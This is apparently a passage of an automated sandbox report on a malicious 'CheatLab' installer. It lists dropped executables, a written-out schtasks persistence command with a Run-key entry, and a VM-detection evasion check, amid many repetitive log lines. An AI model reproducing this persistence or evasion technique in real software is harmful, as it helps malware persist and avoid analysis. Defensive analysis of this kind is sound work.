                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF35B.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID538.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFEEB.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI91F.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID4A9.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID605.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF4F6.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID626.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF3BA.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF459.tmpJump to dropped file
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF5A3.tmpJump to dropped file
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID42B.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID4E9.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF3EA.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID5C6.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSI8FE.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID4C9.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF35B.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIFEEB.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF4F6.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF3BA.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF459.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF5A3.tmpJump to dropped file
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIF3EA.tmpJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:57 /f /tn ServerUpdate_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua""
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LuaJITJump to behavior
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LuaJITJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess information set: NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Windows\SysWOW64\msiexec.exeSystem information queried: FirmwareTableInformationJump to behavior
